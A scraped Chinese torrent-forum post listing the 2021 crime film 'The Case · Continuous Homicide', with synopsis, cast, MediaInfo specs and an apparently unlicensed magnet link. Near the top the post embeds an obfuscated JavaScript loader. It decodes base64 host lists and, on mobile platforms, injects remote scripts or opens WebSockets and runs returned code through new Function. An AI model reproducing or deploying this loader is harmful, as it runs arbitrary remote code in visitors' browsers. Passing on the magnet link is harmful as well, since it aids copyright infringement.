重案行动之连环凶杀[国粤语音轨].The.Case.Continuous.Homicide.2021.4K.WEB-DL.H264.AAC.2Audio-迅雷下载 20.01GB

版主小s 12天前 311

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 重案行动之连环凶杀 / The Case · Continuous Homicide
◎年  代 2021
◎产  地 中国大陆
◎类  别 悬疑 / 犯罪
◎语  言 汉语普通话
◎上映日期 2021-07-20(中国大陆网络)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/35523253/
◎演  员 林子聪 Tze Chung Lam (id:1314402)
       姜皓文 Philip Keung Ho-Man (id:1317884)
       廖启智 Kai Chi Liu (id:1274268)

◎标  签 香港 / 犯罪 / 2021 / 林子聪 / 廖启智 / 香港电影 / 一星不值 / 悬疑

◎简  介
  香港出现神秘自杀事件, 死者在手机视频直播下自焚而死,而在场唯一的目击者却坚称自己当时失去了记忆,并且否认与自杀事件有关。警察重案组接手调查, 所有证据都指向目击者是自编自导自演, 教唆他人自杀的真凶。由于自杀视频的流出,造成公众恐慌,警队高层希望在证据确凿之下尽快结案,以释公众疑虑,但唯独督察黄一聪觉得事有蹊跷。一聪在请示上司后,决定再次对事件展开调查......

  1. General
  2. Unique ID                                : 71670589548534958684994265819020951314 (0x35EB40E26239C533E5AB8998AAFE7F12)
  3. Complete name                            : 重案行动之连环凶杀.Th[email protected]BBQDDQ.COM.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 20.0 GiB
  7. Duration                                 : 1 h 24 min
  8. Overall bit rate                         : 34.0 Mb/s
  9. Encoded date                             : UTC 2021-07-20 15:41:39
  10. Writing application                      : mkvmerge v50.0.0 ('Awakenings') 64-bit
  11. Writing library                          : libebml v1.4.0 + libmatroska v1.6.2
  12. Video
  13. ID                                       : 1
  14. Format                                   : AVC
  15. Format/Info                              : Advanced Video Codec
  16. Format profile                           : [email protected]
  17. Format settings                          : CABAC / 4 Ref Frames
  18. Format settings, CABAC                   : Yes
  19. Format settings, Reference frames        : 4 frames
  20. Format settings, GOP                     : M=4, N=24
  21. Codec ID                                 : V_MPEG4/ISO/AVC
  22. Duration                                 : 1 h 24 min
  23. Bit rate                                 : 33.7 Mb/s
  24. Width                                    : 3 840 pixels
  25. Height                                   : 1 640 pixels
  26. Display aspect ratio                     : 2.35:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 24.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 8 bits
  32. Scan type                                : Progressive
  33. Bits/(Pixel*Frame)                       : 0.223
  34. Stream size                              : 19.8 GiB (99%)
  35. Language                                 : Chinese
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Color range                              : Limited
  39. Color primaries                          : BT.709
  40. Transfer characteristics                 : BT.709
  41. Matrix coefficients                      : BT.709
  42. Audio #1
  43. ID                                       : 2
  44. Format                                   : AAC LC
  45. Format/Info                              : Advanced Audio Codec Low Complexity
  46. Codec ID                                 : A_AAC-2
  47. Duration                                 : 1 h 24 min
  48. Bit rate                                 : 317 kb/s
  49. Channel(s)                               : 2 channels
  50. Channel layout                           : L R
  51. Sampling rate                            : 48.0 kHz
  52. Frame rate                               : 46.875 FPS (1024 SPF)
  53. Compression mode                         : Lossy
  54. Stream size                              : 191 MiB (1%)
  55. Title                                    : 国语
  56. Language                                 : Chinese
  57. Default                                  : Yes
  58. Forced                                   : No
  59. Audio #2
  60. ID                                       : 3
  61. Format                                   : AAC LC SBR
  62. Format/Info                              : Advanced Audio Codec Low Complexity with Spectral Band Replication
  63. Commercial name                          : HE-AAC
  64. Format settings                          : Implicit
  65. Codec ID                                 : A_AAC-2
  66. Duration                                 : 1 h 24 min
  67. Bit rate                                 : 62.7 kb/s
  68. Channel(s)                               : 2 channels
  69. Channel layout                           : L R
  70. Sampling rate                            : 48.0 kHz
  71. Frame rate                               : 23.438 FPS (2048 SPF)
  72. Compression mode                         : Lossy
  73. Stream size                              : 37.7 MiB (0%)
  74. Title                                    : 粤语
  75. Language                                 : Chinese
  76. Default                                  : No
  77. Forced                                   : No


TAGS 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:77223BE9E358B649E65D99B3531E251233681941
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回